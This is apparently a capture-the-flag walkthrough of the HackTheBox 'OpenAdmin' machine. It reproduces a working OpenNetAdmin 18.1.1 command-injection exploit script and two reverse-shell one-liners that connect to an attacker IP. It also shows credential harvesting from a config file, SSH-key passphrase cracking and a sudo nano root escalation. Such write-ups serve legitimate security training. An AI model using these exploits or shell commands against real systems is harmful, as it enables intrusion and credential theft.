OpenAdmin

To those who are bold enough to knock!

HackTheBox OpenAdmin Machine Info Card

OpenAdmin is an easy difficulty machine running Linux. It tests your knowledge in OSINT, exploitation through a publicly known exploit and basic privilege escalation using a GTFOBin.

Be sure to checkout the Basic Setup section before you get started.

Enumeration

Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.

Portscan

portscan openadmin.htb 
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-04 22:52 PST
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds

We have two open ports. SSH on port 22 and Apache on port 80 which we can see goes to the deault ubuntu It Works page.

Directory Bruteforce

Since that page seems like a dead end let’s check for any other directories that may be available:

gobuster dir -u http://openadmin.htb -t 10 -w /usr/share/wordlists/dirb/big.txt -o gobuster_dir.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://openadmin.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/04 22:23:56 Starting gobuster
===============================================================
/artwork (Status: 301)
/music (Status: 301)
/server-status (Status: 403)
/sierra (Status: 301)
===============================================================
2020/01/04 22:25:01 Finished
===============================================================

Let’s take a look at each of the directories we have found.

Arcwork

We have http://openadmin.htb/artwork/ which is a business website for Arcwork:

Nothing seems to stand out at first glance and a quick view of the source reveals nothing interesting.

Sierra

Navigating to http://openadmin.htb/sierra/ we see another business site called Sierra:

I am starting to think there is a theme here. Web hosting or design company?

Sierra also doesn’t show anything interesting on the site or within the source.

SolMusic

Taking a look at http://openadmin.htb/music/ we have another business site called SolMusic:

The first thing that catches our eye in comparison to the other sites is that this site has a Login link in the navbar.

OpenNetAdmin

The link takes us to http://openadmin.htb/ona/ where we come across this page:

Something that is interesting is the Newer Version Available alert that lists the version v18.1.1. Although there is no direct mention of what the web application is there is also a link to ` DOWNLOAD the latest version`.

The download link takes us to http://opennetadmin.com/download.html which is web application that keeps a database managed inventory of your IP network:

Looks like we have found our openadmin reference and most likely our way in!

Foothold

Let’s checkout OpenNetAdmin and see if there are any vulnerabilities available for that version:

searchsploit opennetadmin 18.1.1
-----------------------------------------------------------------------------------------
 Exploit Title                                      |  Path
                                                    | (/usr/share/exploitdb/)
-----------------------------------------------------------------------------------------
OpenNetAdmin 18.1.1 - Remote Code Execution         | exploits/php/webapps/47691.sh
-----------------------------------------------------------------------------------------
Shellcodes: No Result
Papers: No Result

We find one RCE exploit. Let’s check it out and see what we have got:

searchsploit -x exploits/php/webapps/47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Pretty straight forward. The script takes a url as an argument and then using curl with the -d option that sends HTTP POST data. That data is the injection and execution of arbitrary PHP code namingly Ping Command Injection.

Lets go ahead and copy the contents to a file called exploit.sh and see if we can get a shell:

#!/bin/bash
URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
 done

And make the script executable:

chmod +x exploit.sh

Now all that’s left is to give it a run:

./exploit.sh http://openadmin.htb/ona/
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We gain a shell and have access as the www-data user of which will most likely have limited access. We will need to move to another user.

Before we go ahead and do that let’s try and gain a netcat connection so we can upgrade our shell. The nc we have access to doesn’t support the -e option so we will have to do some shell redirect magic.

First off we will set our netcat listener on our attacker machine:

nc -nvlp 1234

We then run the following commands on the victim to receive our connection:

mknod /tmp/backpipe p;/bin/sh -c "/bin/sh 0</tmp/backpipe | nc <attacker-ip> 1234 1>/tmp/backpipe"

From here we can upgrade our shell taking note that the victim machine only has python3 installed.

User

Now we can see what other users we have and check their directory permissions while we are at it:

ls -l /home
total 8
drwxr-x--- 5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna

So we have two users to work with!

Because we are looking at taking over another account we will search for any information leakage like passwords, ssh keys and the likes as well as keeping an eye out for privesc to root. You just never know.

Having a look at OpenNetAdmin’s files it is obvious that the web application requires a database. A quick check shows that there is MySQL running:

ps -aux | grep mysql
mysql     1044  0.1 11.3 1633604 232332 ?      Sl   12:28   0:14 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
www-data 12798  0.0  0.0  11464  1104 pts/0    S+   14:48   0:00 grep mysql

A search of the interweb using the term opennetadmin database password reveals some info that might be of use here.

Let’s check out the file mentioned:

grep passwd /opt/ona/www/local/config/database_settings.inc.php
'db_passwd' => 'n1....0R!',

We find a password! Let’s give ssh a try and see if we get access:

ssh jimmy@openadmin.htb
jimmy@openadmin.htbs password: 
jimmy@openadmin:~$

On inspection of jimmy’s home folder we see that there is no user.txt file. This means we are going to neeed to gain access to joannas account.

Let’s see where jimmy has read and write access:

find / -regextype posix-extended -regex "/(sys|srv|proc|run)" -prune -o -user <username> -ls 2>&1 | grep -v "Permission denied"
				.......................... snip ..........................
   286763      4 drwxrwx---   2 jimmy    internal     4096 Jan  5 12:46 /var/www/internal
   282830      4 -rwxrwxr-x   1 jimmy    internal      389 Jan  5 12:46 /var/www/internal/main.php
     2644      4 -rwxrwxr-x   1 jimmy    internal      185 Nov 23 16:37 /var/www/internal/logout.php
     1387      4 -rwxrwxr-x   1 jimmy    internal     3229 Nov 22 23:24 /var/www/internal/index.php
				.......................... snip ..........................

Taking a look at these files we see that index.php is a login page that seems to accept the username and password of jimmy and main.php has shell_exec('cat /home/joanna/.ssh/id_rsa'); which would output joanna’s SSH key. That is exactly what we are after. We also see Don't forget your "ninja" password. Don’t worry we won’t ;)

These files aren’t in http://openadmin.htb’s root folder. Maybe there is a vhost linking to this location that we haven’t found? Let’s check the apache config:

ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 18:14 default-ssl.conf
-rw-r--r-- 1 root root  303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf

There it is! Taking a look at internal.conf we find what we are looking for:

cat /etc/apache2/sites-available/internal.conf 
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

We see that apache is listening on 127.0.0.1:52846 and a quick curl -u jimmy:n1....0R! 127.0.0.1:52846 outputs the contents of index.php.

Running main.php we see that joanna’s SSH key is printed:

curl -u jimmy:n1....0R! 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
            .... SNIP ....        ....SNIP....
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Dont forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Path 1 - SSH Key

Since we have joanna’s SSH key we can try cracking it. Copy the key to a file on the attacker machine such as id_rsa.

We will then convert the key to a crackable hash:

ssh2john id_rsa > id_rsa-hash

We can then try cracking it with john:

john --wordlist=/root/wordlists/passwords/passwords.txt id_rsa-hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bl....as      (/root/Documents/openadmin/id_rsa-joanna)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:10 DONE (2020-01-14 18:21) 0.09596g/s 1376Kp/s 1376Kc/s 1376KC/sa6_123..*7¡Vamos!
Session completed

NOTE: I don’t use just rockyou.txt. The passwords.txt is a custom created wordlist made from multiple wordlists stripped of all duplicates. You may need to do the same!

We retrieve the SSH passphrase bl....as and can now login via SSH using the id_rsa key:

ssh -i id_rsa-joanna joanna@openadmin.htb
Enter passphrase for key 'id_rsa-joanna':
Last login: Tue Jan 14 18:20:08 2020 from 10.10.14.64
joanna@openadmin:~$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Path 2 - Alter Script

With this script we have command execution as joanna so all we have to do is grab a shell.

So we will edit main.php and replace cat /home/joanna/.ssh/id_rsa with /bin/bash -c 'bash -i >& /dev/tcp/<attacker-ip>/1234 0>&1'.

Then we setup our netcat listener on our attacker machine:

nc -lvp 1234

Now let’s try running main.php using jimmy’s username and password:

curl -u jimmy:n1....0R! 127.0.0.1:52846/main.php

Back at our listener we should receive a connection:

Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:42950.
joanna@openadmin:/var/www$ id
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)

Now we can go for our user flag:

joanna@openadmin:/var/www$ cat /home/joanna/user.txt
c9b2cf07d4....60f0c81b5f

And there we have it! We have our user.txt.

Root

Let’s check to see if we have any sudo privileges.

If we used Path 2 and altered the script then we find that we receive the following error:

sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

We can create an ssh key pair and throw the public key in /home/joanna/.ssh/authorized_keys then we can login via ssh.

sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

We see that we can run nano with sudo and without a password to open the file /opt/priv. Since nano is a GTFOBin we will be able to gain root.

To do so we open our file with nano and then type CTRL+R and then CTRL+X to bring up the Command to execute prompt. We then type in reset; sh 1>&0 2>&0 like so:

That was a nice and easy root :)

Conclusion

This was an interesting machine that had a fair few websites that could have sent some people on a wild goose chase. Focusing on important links like logins can be fruitful. Misconfigurations and outdated software can easily lead to a compromise in the real world. The privilege escalation to root once again outlines the issue with “ease of use” methods such as using sudo without a password. Sadly this is a common realworld situation where people attempt to automate a task that involves a script needing escalated privileges.